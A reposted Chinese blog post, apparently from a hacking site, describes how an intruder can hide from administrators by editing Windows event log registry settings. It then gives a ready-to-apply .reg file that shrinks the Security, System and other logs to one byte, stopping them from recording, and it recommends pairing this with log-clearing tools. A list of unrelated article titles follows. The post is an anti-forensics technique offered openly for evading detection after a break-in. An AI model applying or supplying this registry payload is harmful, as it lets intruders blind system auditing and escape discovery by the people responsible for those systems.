修改日志文件属性保护自己不会被管理员发现(思路)
来源:互联网 发布:海量数据分析 编辑:程序博客网 时间:2024/05/01 05:22
by ha0k
日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,
这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,
这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%/System32/Config/Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Security]
"file"="%SystemRoot%/System32/config/SecEvent.Evt"
"MaxSize"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/System]
"EventMessageFile"="%systemroot%/system32/qq.exe"
"File"="%SystemRoot%/system32/config/SysEvent.Evt"
"MaxSize"=dword:00000001
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/144.html}
- 修改日志文件属性保护自己不会被管理员发现(思路)
- 郁闷,发现自己太不会应变了。。。
- 修改文件属性
- 文件属性修改
- JavaScript 不会保护 hasOwnProperty 被非法占用
- mac 下管理员无权限修改文件问题以及rootLess内核保护开关
- 修改word文件属性
- Linux 修改文件属性
- SetFileAttributes 功能:修改文件属性
- 修改只读文件属性
- vbs 修改文件属性
- VC 修改文件属性
- Linux 修改文件属性
- java 获取、修改文件属性
- 文件属性及权限修改
- 最近发现自己还不会进制转换呢,学的时候就顺势总结一下
- 一个不会言谈的程序员,惊奇发现自己能力的多么的优秀
- 【Usaco2015 JAN】Moovie Mooving【DP】(发现自己有点不会写二分啊)
- pk头发不乱讲的oa系统怎么初始化不了____急死人了
- 20091012_language_english
- 花了一下午,弄明白四个名词 USCI,USI,LIN,IrDa
- Struts中Title标签简介
- Windows服务程序与SOCKET服务器联合应用时客户端遇到的SOCKET:10060错小结
- 修改日志文件属性保护自己不会被管理员发现(思路)
- spring c3p0的配置参数说明
- 已经谈不起恋爱的80后 —— 已经偷偷老去的80后
- web developer tips (53):在vs的设计视图编辑gridview的模板
- DB2 HADR
- VS2005的一些环境设置(1字体)
- 关于C#与Access的一个例子[转]
- 解决DBGridEh字段为空NULL时的第三状态显示为非选中状态方法
- 不错的struts插件:Struts Spring Plugin